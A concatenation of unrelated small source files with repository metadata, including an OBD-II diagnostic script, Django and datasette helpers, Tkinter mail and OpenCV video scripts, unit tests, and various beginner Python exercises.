    panda = Panda()
    # ELM327 safety mode restricts the panda to diagnostic-style traffic.
    panda.set_safety_mode(Panda.SAFETY_ELM327)
    panda.can_clear(0)
    # 09 02 = Get VIN
    isotp_send(panda, "\x09\x02", 0x7df)
    ret = isotp_recv(panda, 0x7e8)
    hexdump(ret)
    print "VIN: %s" % ret[2:]
    # 03 = get DTCS
    isotp_send(panda, "\x03", 0x7e0)
    dtcs = isotp_recv(panda, 0x7e8)
    print "DTCs:", dtcs[2:].encode("hex")
    supported_pids = get_supported_pids()
    print "Supported PIDs:",supported_pids
    # Poll standard service-01 PIDs; scaling per the OBD-II PID definitions.
    while 1:
        speed = struct.unpack(">B", get_current_data_for_pid(13)[2:])[0]  # kph
        rpm = struct.unpack(">H", get_current_data_for_pid(12)[2:])[0]/4.0  # revs
        throttle = struct.unpack(">B", get_current_data_for_pid(17)[2:])[0]/255.0 * 100  # percent
        temp = struct.unpack(">B", get_current_data_for_pid(5)[2:])[0] - 40  # degrees C
        load = struct.unpack(">B", get_current_data_for_pid(4)[2:])[0]/255.0 * 100  # percent
        print "%d KPH, %d RPM, %.1f%% Throttle, %d deg C, %.1f%% load" % (speed, rpm, throttle, temp, load)
        time.sleep(0.2)
|
[
"user@comma.ai"
] |
user@comma.ai
|
3b3efdfad9fac7e5373bbc3882ccc7ed1d90ec0f
|
afc87a0ecde9869df0802d6ad79d18d9722727d8
|
/oregon/home/templatetags/home_d3tags.py
|
c524d18698e81791c61541dc6872a722ddcb0dd8
|
[] |
no_license
|
hobson/oregon
|
cc005e5fb158142cb0879db1bae73b040815cc3a
|
4cd3cc8696db25f531839dbda4c903357df27e58
|
refs/heads/master
| 2021-01-19T03:23:29.595855
| 2013-10-01T05:57:40
| 2013-10-01T05:57:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 497
|
py
|
from django.core.serializers import serialize
from django.core.serializers.json import DjangoJSONEncoder
from django.db.models.query import QuerySet
from django.template import Library
from django.utils import simplejson
register = Library()
#@register.filter(name='jsonify')
def jsonify(object):
    """ Template filter: serialises a QuerySet via Django's JSON serializer,
        and any other value via simplejson with DjangoJSONEncoder. """
    if not isinstance(object, QuerySet):
        return simplejson.dumps(object, cls=DjangoJSONEncoder)
    return serialize('json', object)
# Output is JSON, safe to emit without further escaping.
jsonify.is_safe = True
register.filter('jsonify', jsonify)
|
[
"hobsonlane@gmail.com"
] |
hobsonlane@gmail.com
|
6856c56c7c43315dc8a2657bc9746e449d89c043
|
56fdddd67821db9bb21dc2f851a1ae3b22256429
|
/s1level41.py
|
0c008ae52c1c1f555652671295617d095ad07e47
|
[
"Unlicense"
] |
permissive
|
gemeraldsfilms/code-org-python
|
359276751a08d6a66ca5199dbdd1004c5d4eccd1
|
bd6e0871de3e23d3e94212caf94d57997b504134
|
refs/heads/master
| 2021-01-14T11:25:58.986699
| 2014-10-31T18:21:33
| 2014-10-31T18:21:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 246
|
py
|
import codestudio

# Code.org artist puzzle s1level41: draw ten randomly coloured squares,
# stepping forward between them.
artist = codestudio.load('s1level41')
for _ in range(10):
    artist.pen.color = 'random'
    # One 20-unit square.
    for _ in range(4):
        artist.move_forward(20)
        artist.turn_right(90)
    # Advance to the next square's starting point.
    artist.move_forward(20)
artist.check()
|
[
"rob@skilstak.com"
] |
rob@skilstak.com
|
1023ebd93d98f3012ed40bb1e458b458c8d3cddf
|
875a711df288d33778e2ae876f8f67490c91a7a1
|
/PathMangerExamples.py
|
f64b79ab66d397fdd0efb3a13b2f0faacbcb5338
|
[] |
no_license
|
zethwillie/chrlx_pipe
|
4c45bd51591a6dbdbe848da348ae3835569397d7
|
7c69818c125fc01a07a7294bd8d34d28a61f04bc
|
refs/heads/master
| 2021-01-22T21:17:56.259480
| 2017-08-18T04:28:11
| 2017-08-18T04:28:11
| 100,672,617
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,630
|
py
|
from chrlx.utils import PathManager

# Demo script (Python 2 -- print statements) that constructs a PathManager from
# a workshop scene path and dumps every derived attribute.
# NOTE(review): the path below is a non-raw string full of backslashes; it only
# works because Python leaves unrecognised escapes (\j, \c, \W, ...) literal.
# A raw string r"G:\jobs\..." would be safer -- confirm before changing.
path = PathManager("G:\jobs\charlex_testArea_T60173\W_psultan\scenes\shot010\lgt\workshop\T60173W_010_std_software.01.ma")
#job info determined by folder structure
print "jobNumber:", path.jobNumber
print "jobDirname:", path.jobDirname
print "jobShortname:", path.jobShortname
print "jobType:", path.jobType
print "jobPath:", path.jobPath
print "spotLetter:", path.spotLetter
print "spotDirname:", path.spotDirname
print "spotFullname:", path.spotFullname
print "spotShortname:", path.spotShortname
print "spotSchema:", path.spotSchema
print "spotPath:", path.spotPath
print "projectPath:", path.projectPath
print "configPath:", path.configPath
print "assetPath:", path.assetPath
print "charPath:", path.charPath
print "propPath:", path.propPath
print "shot:", path.shot
print "shotName:", path.shotName
print "shotType:", path.shotType
print "shotFullname:", path.shotFullname
print "shotShortname:", path.shotShortname
print "shotStage:", path.shotStage
print "scenePath:", path.scenePath
print "compPath:", path.compPath
print "anmPath:", path.anmPath
print "lgtPath:", path.lgtPath
print "jobId", path.job.id #many attributes are accessible with dot notation
#folder navigation
print "scenePath", path.scenePath
print "compPath", path.compPath
print "framesPath", path.framesPath
#job info determined by db
print "start_date", path.job.start_date
print "status", path.spot.status
#lgt shot specific functions
print "variants", path.getVariants()
print "masters", path.getMasters()
print "mastername", path.getMasterName()
print "version", path.getVersion()
|
[
"zethwillie@gmail.com"
] |
zethwillie@gmail.com
|
1d0101942a1f8158b1df89d28a581f8a989d6099
|
a7cca49626a3d7100e9ac5c2f343c351ecb76ac7
|
/tests/dev_tests/get_machine_freq.py
|
53f58efc5548afd9221dc39ed26ccc27e86361d3
|
[
"MIT"
] |
permissive
|
Carglglz/upydev
|
104455d77d64300074bda54d86bd791f19184975
|
529aa29f3e1acf8160383fe410b5659110dc96de
|
refs/heads/master
| 2023-05-24T18:38:56.242500
| 2022-10-21T14:03:17
| 2022-10-21T14:03:17
| 199,335,165
| 49
| 9
|
MIT
| 2022-10-21T14:03:18
| 2019-07-28T20:42:00
|
Python
|
UTF-8
|
Python
| false
| false
| 137
|
py
|
import machine
def freq():
    """ Returns the machine clock frequency in MHz.

    machine.freq() yields either an int in Hz or, on some MicroPython ports,
    a tuple whose first element is the CPU frequency in Hz.
    """
    raw = machine.freq()
    if isinstance(raw, tuple):
        raw = raw[0]
    return int(raw / 1e6)
|
[
"carlosgilglez@gmail.com"
] |
carlosgilglez@gmail.com
|
bc5354942ec4f909d4ccdf9434a01480c07a0da5
|
86cc17a69213569af670faed7ad531cb599b960d
|
/player12.py
|
9f6d8ddf708fb3e1cbee2e05883e552d33187881
|
[] |
no_license
|
LakshmikanthRavi/guvi-lux
|
ed1c389e27a9ec62e0fd75c140322563f68d311a
|
5c29f73903aa9adb6484c76103edf18ac165259e
|
refs/heads/master
| 2020-04-15T05:07:19.743874
| 2019-08-13T08:53:00
| 2019-08-13T08:53:00
| 164,409,489
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 161
|
py
|
# Reads a length u, a rotation count m, and u integers; prints the list
# rotated so its last m elements come first.
u, m = map(int, input().split())
g = list(map(int, input().split()))
# Slicing performs the rotation directly. The previous version appended the
# remaining elements with an "if i not in r" membership test, which silently
# dropped duplicate values (and was O(n^2)); slicing is correct for all inputs.
r = g[u - m:] + g[:u - m]
print(*r)
|
[
"noreply@github.com"
] |
LakshmikanthRavi.noreply@github.com
|
e02eccd31bb9c7d6aaa7d19529cafad2e12d8805
|
672ea11a7dee763fc8c37bc82bb609b8de19344c
|
/src/生成斗地主扑克牌.py
|
28fff2f03a30318453efc6cfebefc64fa9a69cbd
|
[] |
no_license
|
qlong8807/python3-lesson
|
294ede6a0de1d89f513209b00504e8f0c9bb2607
|
ac4e745a8e8d0ab665e2ff676ddcd0ab190fed06
|
refs/heads/master
| 2020-04-08T15:18:44.564272
| 2020-02-18T08:33:30
| 2020-02-18T08:33:30
| 159,472,820
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 687
|
py
|
# coding:utf8
# author:jans
# desc: build a 54-card deck, shuffle it, and deal for Dou Dizhu
#       (three hands of 17 cards plus a 3-card kitty).
import random

# Ranks 2-10, the face/ace ranks, the two jokers, and the four suits.
poker_num = [str(i) for i in range(2, 11)]
poker_str = ['A', 'J', 'Q', 'K']
poker_king = ['大王', '小王']
poker_color = ['红', '黑', '方', '花']
# Every suit/rank combination, then the jokers: 4 * 13 + 2 = 54 cards.
pokers = [suit + rank for suit in poker_color for rank in poker_num + poker_str] + poker_king
print(len(pokers))
print(pokers)
print('开始洗牌')
random.shuffle(pokers)
print('洗牌中。。。')
print(pokers)
# Deal every third card to each player; the last three form the kitty.
person_a = pokers[0:51:3]
person_b = pokers[1:51:3]
person_c = pokers[2:51:3]
last_3 = pokers[-3:]
print('第一个人的牌:', person_a)
print('第二个人的牌:', person_b)
print('第三个人的牌:', person_c)
print('底牌:', last_3)
|
[
"qlong8807@hotmail.com"
] |
qlong8807@hotmail.com
|
4ab465fcdde84101246798cce491652b00295dce
|
63cf686bf970d28c045719de2f0e7e9dae5bed15
|
/N-th Tribonacci Number.py
|
13e5231116e6aba79408a56a4f23a7c77a01f1bf
|
[] |
no_license
|
menard-noe/LeetCode
|
6461bda4a076849cf69f2cd87999275f141cc483
|
4e9c50d256c84d1b830a7642b265619a0b69d542
|
refs/heads/master
| 2022-12-13T09:41:41.682555
| 2020-09-14T12:46:53
| 2020-09-14T12:46:53
| 282,481,920
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 493
|
py
|
from typing import List
class Solution:
def __init__(self):
self.memo = {0: 0, 1: 1, 2: 1}
def tribonacci(self, n: int) -> int:
if n in self.memo:
return self.memo[n]
else:
self.memo[n] = self.tribonacci(n - 1) + self.tribonacci(n - 2) + self.tribonacci(n - 3)
return self.memo[n]
if __name__ == "__main__":
# execute only if run as a script
n = 25
solution = Solution()
print(solution.tribonacci(n))
|
[
"noe.menard4@gmail.com"
] |
noe.menard4@gmail.com
|
d37e9764102913288d0e90d9ba66699201662d2d
|
3b2940c38412e5216527e35093396470060cca2f
|
/top/api/rest/LogisticsOrderShengxianConfirmRequest.py
|
3a40c08aaf7002f5809c5f42c433f502317e3311
|
[] |
no_license
|
akingthink/goods
|
842eb09daddc2611868b01ebd6e330e5dd7d50be
|
ffdb5868a8df5c2935fc6142edcdf4c661c84dca
|
refs/heads/master
| 2021-01-10T14:22:54.061570
| 2016-03-04T09:48:24
| 2016-03-04T09:48:24
| 45,093,302
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 516
|
py
|
'''
Created by auto_sdk on 2015-01-20 12:44:31
'''
from top.api.base import RestApi
class LogisticsOrderShengxianConfirmRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.cancel_id = None
self.delivery_type = None
self.logis_id = None
self.out_sid = None
self.seller_ip = None
self.sender_id = None
self.service_code = None
self.tid = None
def getapiname(self):
return 'taobao.logistics.order.shengxian.confirm'
|
[
"yangwenjin@T4F-MBP-17.local"
] |
yangwenjin@T4F-MBP-17.local
|
14955d30fe26123e3716725167c4d68ad49205a2
|
e76ea38dbe5774fccaf14e1a0090d9275cdaee08
|
/src/cc/DEPS
|
4e1cc74d6cc126e06e3aa1337ee58dc83ccb80ad
|
[
"BSD-3-Clause"
] |
permissive
|
eurogiciel-oss/Tizen_Crosswalk
|
efc424807a5434df1d5c9e8ed51364974643707d
|
a68aed6e29bd157c95564e7af2e3a26191813e51
|
refs/heads/master
| 2021-01-18T19:19:04.527505
| 2014-02-06T13:43:21
| 2014-02-06T13:43:21
| 16,070,101
| 1
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 561
|
include_rules = [
"+gpu/GLES2",
"+gpu/command_buffer/client/context_support.h",
"+gpu/command_buffer/common/gpu_memory_allocation.h",
"+gpu/command_buffer/common/mailbox.h",
"+media",
"+skia/ext",
"+third_party/skia/include",
"+third_party/khronos/GLES2/gl2.h",
"+third_party/khronos/GLES2/gl2ext.h",
"+ui/events/latency_info.h",
"+ui/gfx",
"+ui/gl",
# DO NOT ADD ANY NEW WEBKIT HEADERS TO THIS LIST.
# TODO(danakj): Drop dependencies on WebKit Platform API from cc.
"+third_party/WebKit/public/platform/WebGraphicsContext3D.h",
]
|
[
"ronan@fridu.net"
] |
ronan@fridu.net
|
|
7b2a0da5898ff8cc6de859b91194a6f1fd42975e
|
03534ce46ccb4d82e7752cac264884090c16ae1f
|
/PyBind11/config.py
|
a61a9b2d3e787f538b9046e074857e84ede13092
|
[] |
no_license
|
alex-v-dev/dependencies
|
0ca2a67b97bb9403fa973d4b0a9f34f98694bcdd
|
11307514feccd38eeda66c9f0b83194358ffc956
|
refs/heads/master
| 2023-07-04T22:49:52.940631
| 2021-06-14T13:34:27
| 2021-06-14T13:34:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 457
|
py
|
{
"downloads" : [
"https://github.com/pybind/pybind11/archive/v2.6.2.tar.gz"
],
"url" : "https://pybind11.readthedocs.io",
"license" : "LICENSE",
"dependencies" : [ "Python" ],
"environment" : {
"PATH" : "{buildDir}/bin:$PATH",
"LD_LIBRARY_PATH" : "{buildDir}/lib",
},
"commands" : [
"cmake"
" -D CMAKE_INSTALL_PREFIX={buildDir} ."
" -D PYBIND11_TEST=0",
"make install",
],
"manifest" : [
"include/pybind11",
],
}
|
[
"thehaddonyoof@gmail.com"
] |
thehaddonyoof@gmail.com
|
089de6e71f93ea67d7b8693f6b0221acef7db5d3
|
20cc35cb819d988d35d25ae942d0ecc9fe7bc726
|
/Prac_03/word_generator_prac_three.py
|
252cd137d3a0b982f809d37432661bd9d8b0abde
|
[] |
no_license
|
LukeElliman/Practicals
|
1272b51e9ef45f27dcb31f7d1238a429e14f3d15
|
f9de0adff1616e4b797b96f83fa1869790a0492f
|
refs/heads/master
| 2023-05-05T21:42:45.922665
| 2021-05-23T23:36:08
| 2021-05-23T23:36:08
| 341,446,239
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,608
|
py
|
"""
CP1404/CP5632 - Practical
Random word generator - based on format of words
Another way to get just consonants would be to use string.ascii_lowercase
(all letters) and remove the vowels.
"""
import random
VOWELS = "aeiou"
CONSONANTS = "bcdfghjklmnpqrstvwxyz"
VALID_INPUT = "cv"
def main():
#User input
valid_input = False
while not valid_input:
word_format = str(input("Enter c's for consonant and v's for vowels: ")).lower()
valid_input = is_valid_format(word_format)
word = word_generator(word_format)
print(word + "\n")
#Random
number_of_letters = int(input("How many letters do you want? "))
letters = "cv"
word_format = "".join(random.choice(letters) for i in range(number_of_letters))
word = word_generator(word_format)
print(word)
def is_valid_format(user_input):
"""Checks if input is valid"""
valid = False
valid_character_count = 0
for each_character in user_input:
if each_character not in VALID_INPUT:
valid_character_count += 1
if valid_character_count > 0:
print("Your input must only be c's and v's")
valid_character_count = 0
elif len(user_input) <= 0:
print("Your input must have more then 0 characters")
else:
print("Valid input \n")
valid = True
return valid
def word_generator(user_input):
"""Turns the cv input into words"""
word = ""
for kind in user_input:
if kind == "c":
word += random.choice(CONSONANTS)
else:
word += random.choice(VOWELS)
return word
main()
|
[
"luke.elliman@my.jcu.edu.au"
] |
luke.elliman@my.jcu.edu.au
|
497e239e4a4996a03027feed630c538b6b031e56
|
493fcf4b7eb61a00a51864ba2b3544541dee2935
|
/labman/gui/test/test_study.py
|
b82f7d7b999379932f6bcd0d4d743a94ba366e7a
|
[
"BSD-3-Clause"
] |
permissive
|
antgonza/labman
|
d56ab55debdbea4024e12b6e84625b5a472fdbe2
|
c3bb7a15cbfdbbf60a7b2b176fff207f99af0002
|
refs/heads/master
| 2021-05-11T16:09:12.890965
| 2019-04-08T23:29:09
| 2019-04-08T23:29:09
| 117,754,098
| 0
| 0
|
BSD-3-Clause
| 2019-03-31T20:38:09
| 2018-01-16T23:10:41
|
Python
|
UTF-8
|
Python
| false
| false
| 3,280
|
py
|
# ----------------------------------------------------------------------------
# Copyright (c) 2017-, labman development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
from unittest import main
from tornado.escape import json_decode
from labman.gui.testing import TestHandlerBase
class TestStudyHandlers(TestHandlerBase):
def test_get_study_list_handler(self):
response = self.get('/study_list')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = {'data': [
[1, 'Identification of the Microbiomes for Cannabis Soils',
'Cannabis Soils', 'test@foo.bar', 27]]}
self.assertEqual(obs, exp)
def test_get_study_handler(self):
response = self.get('/study/1/')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = {'study_id': 1,
'study_title': 'Identification of the Microbiomes for '
'Cannabis Soils',
'total_samples': 27}
self.assertEqual(obs, exp)
# Test non-existent study
response = self.get('/study/400/')
self.assertEqual(response.code, 404)
def test_get_study_samples_handler(self):
response = self.get('/study/1/samples')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = ['1.SKB1.640202', '1.SKB2.640194', '1.SKB3.640195',
'1.SKB4.640189', '1.SKB5.640181', '1.SKB6.640176',
'1.SKB7.640196', '1.SKB8.640193', '1.SKB9.640200',
'1.SKD1.640179', '1.SKD2.640178', '1.SKD3.640198',
'1.SKD4.640185', '1.SKD5.640186', '1.SKD6.640190',
'1.SKD7.640191', '1.SKD8.640184', '1.SKD9.640182',
'1.SKM1.640183', '1.SKM2.640199']
self.assertEqual(obs, exp)
response = self.get('/study/1/samples?term=SKB')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = ['1.SKB1.640202', '1.SKB2.640194', '1.SKB3.640195',
'1.SKB4.640189', '1.SKB5.640181', '1.SKB6.640176',
'1.SKB7.640196', '1.SKB8.640193', '1.SKB9.640200']
self.assertEqual(obs, exp)
response = self.get('/study/1/samples?term=SKB1')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = ['1.SKB1.640202']
self.assertEqual(obs, exp)
response = self.get('/study/1/samples?term=1.64')
self.assertEqual(response.code, 200)
obs = json_decode(response.body)
exp = ['1.SKB1.640202', '1.SKD1.640179', '1.SKM1.640183']
self.assertEqual(obs, exp)
# test non-existent study
response = self.get('/study/400/sample_search')
def test_get_study_summary_handler(self):
response = self.get('/study/1/summary')
self.assertEqual(response.code, 200)
self.assertNotEqual(response.body, '')
response = self.get('/study/1000/summary')
self.assertEqual(response.code, 404)
if __name__ == '__main__':
main()
|
[
"josenavasmolina@gmail.com"
] |
josenavasmolina@gmail.com
|
1a728171fa0d72923f75ff0a93d3da29aad4725e
|
4476597f6af6b9cd4614bf558553a7eb57c9f993
|
/io/email-send.py
|
b0c8e5b3defd2e2685124e52af398dd84e39b324
|
[] |
no_license
|
zhengziqiang/mypython
|
07dff974f475d1b9941b33518af67ece9703691a
|
7a2b419ff59a31dc937666e515490295f6be8a08
|
refs/heads/master
| 2021-07-14T20:01:34.231842
| 2017-04-19T01:18:25
| 2017-04-19T01:18:25
| 56,583,430
| 3
| 1
| null | 2020-07-23T11:46:35
| 2016-04-19T09:26:39
|
Python
|
UTF-8
|
Python
| false
| false
| 3,529
|
py
|
from Tkinter import *
from smtplib import *
import string
import tkMessageBox as mes
class loginPage(object):
def __init__(self,master,info='Mail Send System'):
self.master=master
self.mainlabel=Label(master,text=info,justify=CENTER)
self.mainlabel.grid(row=0,columnspan=3)
self.user=Label(master,text='username',borderwidth=2)
self.user.grid(row=1,sticky=W)
self.pwd=Label(master,text='passwd',borderwidth=2)
self.pwd.grid(row=2,sticky=W)
self.userEntry=Entry(master)
self.userEntry.grid(row=1,column=1,columnspan=2)
self.userEntry.focus_set()
self.pwdEntry=Entry(master,show='*')
self.pwdEntry.grid(row=2,column=1,columnspan=1)
self.loginButton=Button(master,text='login',borderwidth=2,command=self.login)
self.loginButton.grid(row=3,column=1)
self.clearButton=Button(master,text='Clear',borderwidth=2,command=self.clear)
self.clearButton.grid(row=3,column=2)
def login(self):
self.username=self.userEntry.get().strip()
self.passwd=self.pwdEntry.get().strip()
if len(self.username) ==0 or len(self.passwd)==0 or '@' not in self.username:
mes.showwarning('warning','passwd or username is not right')
self.clear()
self.userEntry.focus_set()
return
self.get_smtp()
self.connect()
def connect(self):
'this method will try to connect to the smtp server according to the current user'
HOST='smtp' + self.smtp + '.com'
try:
self.mysmtp=SMTP(HOST)
self.mysmtp.login(self.username,self.passwd)
except Exception, e:
mes.showerror('connecting error','%s'%e)
return
self.mySendMail=sendMail(self.master,self.mysmtp,self.username)
def clear():
self.userEntry.delete(0,END)
self.pwdEntry.delete(0,END)
def get_smtp(self):
'this method try to obtain the smtp host according the user account'
firstSplit=self.username.split('@')[1]
self.smtp=firstSplit.split('.')[0]
class sendMail(object):
def __init__(self,master,smtp='',sender=''):
self.smtp=smtp
self.sender=sender
self.sendPage=Toplevel(master)
self.sendToLabel = Label(self.sendPage,text='send to:')
self.sendToLabel.grid()
self.sendToEntry = Entry(self.sendPage)
self.sendToEntry.grid(row=0,column=1)
self.subjectLabel=Label(self.sendPage,text='subject:')
self.subjectLabel.grid(row=1,column=0)
self.subjectEntry=Entry(self.sendPage)
self.subjectEntry.grid(row=1,column=1)
self.fromTolabel=Label(self.sendPage,text='from to')
self.fromTolabel.grid(row=2,column=0)
self.fromToAdd=Label(self.sendPage,text=self.sender)
self.fromToAdd.grid(row=2,column=1)
self.sendText=Text(self.sendPage)
self.sendText.grid(row=3,column=0,columnspan=2)
self.newButton=Button(self.sendPage,text='new mail',command=self.newMail)
self.newButton.grid(row=4,column=1)
def getMailInfo(self):
self.sendToAdd=self.sendToEntry.get().strip()
self.subjectInfo=self.subjectEntry.get().strip()
self.sendTextInfo=self.sendText.get(1.0.END)
def sendMail(self):
self.getMailInfo()
body=string.join(("From: %s" % self.sender, "To: %s" % self.sendToAdd, "Subject: %s" % self.subjectInfo, "", self.sendTextInfo), "\r\n")
try:
self.smtp.sendmail(self.sender,[self.sendToAdd],body)
except Exception as e:
mes.showerror("send failure:","%s"%e)
mes.showinfo('Prompt','success')
def newMail(self):
self.sendToEntry.delete(0,END)
self.subjectEntry.delete(0,END)
self.sendText.delete(1,END)
if __name__=='__main__':
root=Tk()
root.title('simple mail send system')
mylogin=loginPage(root)
mainloop()
|
[
"1174986943@qq.com"
] |
1174986943@qq.com
|
580123fccf31e7c332168aeb8fe195413662dc0f
|
8aa50378af42f325083be548baaf78b4dbf619ab
|
/OpenCVTest/ReadWebMFile/read_n_save_to_video.py
|
cb193792096e706e0ef3c655661e388c76d2d982
|
[] |
no_license
|
jamescfli/PythonTest
|
35919a6671b3d85a0f0212ea6da8baefbd5fcbe0
|
87c4092b046fba45e3e98f03944c17edde11b8b1
|
refs/heads/master
| 2021-01-20T02:44:25.963174
| 2017-07-01T15:58:32
| 2017-07-01T15:58:32
| 62,287,876
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,272
|
py
|
import cv2
# video_filepath = './video_clips/b.mp4' # no problem for .mp4 in general, but this one does not work
# video_filepath = './video_clips/b.webm'
# video_filepath = './video_clips/test.webm'
video_filepath = './video_out/b_640x1280_15fps.mp4'
# video_filepath = './video_out/b_640x1280_60fps.mp4'
# .. Issue: VIDEOIO(cvCreateFileCapture_AVFoundation (filename)): raised unknown C++ exception!
print("loading {}".format(video_filepath))
cap = cv2.VideoCapture(video_filepath)
# cap = cv2.VideoCapture(video_filepath, cv2.CAP_FFMPEG) # after brew install ffmpeg
print("capture finished")
output_shape = (480, 960)
# const char* filename, int fourcc, double fps, CvSize frame_size, int is_color=1 (gray or color)
# forcecc = cv2.VideoWriter_fourcc('D', 'I', 'V', 'X')
# forcecc = cv2.VideoWriter_fourcc('X', 'V', 'I', 'D')
forcecc = cv2.VideoWriter_fourcc(*'MPEG')
out = cv2.VideoWriter('./video_out/output.avi', forcecc, 30.0, output_shape[::-1], isColor=True)
print('finish init video writer')
frame_counter = 0
while (cap.isOpened()):
ret, frame = cap.read()
if ret:
frame_counter += 1
out.write(frame)
else:
break
print frame_counter # 2473 frames for b.mp4
cap.release()
out.release()
cv2.destroyAllWindows()
|
[
"jamescfli@yahoo.com"
] |
jamescfli@yahoo.com
|
5ed9622704f875d95003d08b1e22ecbfb53984cd
|
99ca151c59afd9c0e7091b6919768448e40f88a2
|
/numpy_and_math_error.py
|
ae3f097ca8ea71aad9e01311276bd6f306b6dfdb
|
[] |
no_license
|
zainabnazari/Python_note
|
1b6a454f6e7b3aca998d87a201823a600ec28815
|
3beb52beb3a0ebe17a6ac8c5695670e9dde59269
|
refs/heads/main
| 2023-02-10T22:32:33.160428
| 2021-01-12T18:36:54
| 2021-01-12T18:36:54
| 304,724,221
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 344
|
py
|
#file name: numpy_and_math_error.py
import numpy as np
import math
myarray = np.array([1,2,3])
root = math.sqrt(myarray)
print(root)
"""
Output:
Traceback (most recent call last):
File "numpy_and_math_error.py", line 5, in <module>
root = math.sqrt(myarray)
TypeError: only size-1 arrays can be converted to Python scalars
"""
|
[
"nazari.zainab@gmail.com"
] |
nazari.zainab@gmail.com
|
dd9947fc7776c6931faffc56c6329f2422b0f5d0
|
04a77043cebd9415069aad4a6b8e7af077de1168
|
/1-pbase/day11/exmple/filter.py
|
c8a7fa97539cd633362bc8a071f7fe9afc4d4bc4
|
[] |
no_license
|
yangxiangtao/biji
|
a935fbc4af42c81205900cb95a11e98c16d739de
|
5c5f46e6c145fc02ea10b7befdc05c489fc3b945
|
refs/heads/master
| 2022-11-12T02:25:51.532838
| 2019-04-02T01:22:12
| 2019-04-02T01:22:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 204
|
py
|
# def is_odd(x):
# return x%2==1
# for x in filter(is_odd,range(20)):
# print(x)
# for x in filter(lambda x:x%2==1,range(10)):
# print(x)
L=list(filter(lambda x: x%2==1,range(10)))
print(L)
|
[
"123@bb.com"
] |
123@bb.com
|
0ba46ca25f7954a614e976605f8cede03101b4ed
|
1356c64ee93435b3d312c8abbf0cfbdf28935645
|
/2565_electric_flex_20191212.py
|
3984d15a3a4e99cec8677dff6cf213d5e661f827
|
[] |
no_license
|
tmtmaj/algorithm_2019_12_03
|
48829c6c03fa1b4528fc161056303c30eab1a31a
|
bf86bd36a044978fa3a60b65a7a248de2a2052ac
|
refs/heads/master
| 2021-06-25T05:07:42.726320
| 2021-05-08T14:20:02
| 2021-05-08T14:20:02
| 225,642,301
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,501
|
py
|
# import sys
# cmd = lambda: sys.stdin.readline()
#
# def x_func(e_list):
# e_list = e_list
# x_list = [0 for _ in range(len(e_list))]
#
# for i in range(len(e_list)):
# for j in range(i + 1, len(e_list)):
# if (e_list[i][0] > e_list[j][0] and e_list[i][1] < e_list[j][1]) or (e_list[i][0] < e_list[j][0] and e_list[i][1] > e_list[j][1]):
# x_list[i] += 1
# x_list[j] += 1
#
# return x_list
#
#
# N = int(cmd().strip())
# e_list = []
# cnt = 0
#
# for _ in range(N):
# e_list.append(list(map(int, cmd().strip().split())))
#
# x_list = [0 for _ in range(N)]
#
# # print(e_list)
# for i in range(N):
# for j in range(i+1, N):
# if (e_list[i][0] > e_list[j][0] and e_list[i][1] < e_list[j][1]) or (e_list[i][0] < e_list[j][0] and e_list[i][1] > e_list[j][1]):
# x_list[i] += 1
# x_list[j] += 1
#
# # print(x_list)
#
# while max(x_list) != 0:
# max_x = max(x_list)
# max_x_index = x_list.index(max_x)
# del e_list[max_x_index]
# x_list = x_func(e_list)
# cnt += 1
# print(x_list)
# print(e_list)
#
# print(cnt)
import sys
cmd = lambda: sys.stdin.readline()
N = int(cmd().strip())
e_list = [list(map(int, cmd().strip().split())) for _ in range(N)]
e_list.sort(key = lambda x: x[0])
lis = [1]
for i in range(1, N):
lis.append(1)
for j in range(i):
if e_list[i][1] > e_list[j][1] and lis[j] + 1 > lis[i]:
lis[i] = lis[j] + 1
print(N - max(lis))
|
[
"qkrwjdgur09@naver.com"
] |
qkrwjdgur09@naver.com
|
48c0e9e27a52eafca750b8ee40a439230b894fcf
|
116aadef9866be33782c6cbd06901703728295cc
|
/datasette_tiles/__init__.py
|
f8a2f4b9cec6f2c18358bdf5ac7b743a850c6d3f
|
[
"Apache-2.0"
] |
permissive
|
dracos/datasette-tiles
|
9c4cf6ca683a703f08e1f69cbc4def3694d7bcc3
|
f7aa1a49df23584445cf154ad0e3e6d750965b15
|
refs/heads/main
| 2023-02-28T22:33:08.331682
| 2021-02-03T22:21:57
| 2021-02-03T22:21:57
| 335,932,265
| 0
| 0
| null | 2021-02-04T11:24:40
| 2021-02-04T11:24:39
| null |
UTF-8
|
Python
| false
| false
| 6,641
|
py
|
from datasette import hookimpl
from datasette.utils.asgi import Response, NotFound
from datasette_tiles.utils import detect_mtiles_databases, tiles_stack_database_order
import json
# 256x256 PNG of colour #dddddd, compressed using https://squoosh.app
PNG_404 = (
b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x01\x00\x00\x00\x01\x00\x04\x00\x00"
b"\x00\x00\xbc\xe9\x1a\xbb\x00\x00\x00\x9cIDATx\xda\xed\xce1\x01\x00\x00\x0c\x02"
b"\xa0\xd9?\xe3\xba\x18\xc3\x07\x12\x90\xbf\xad\x08\x08\x08\x08\x08\x08\x08\x08"
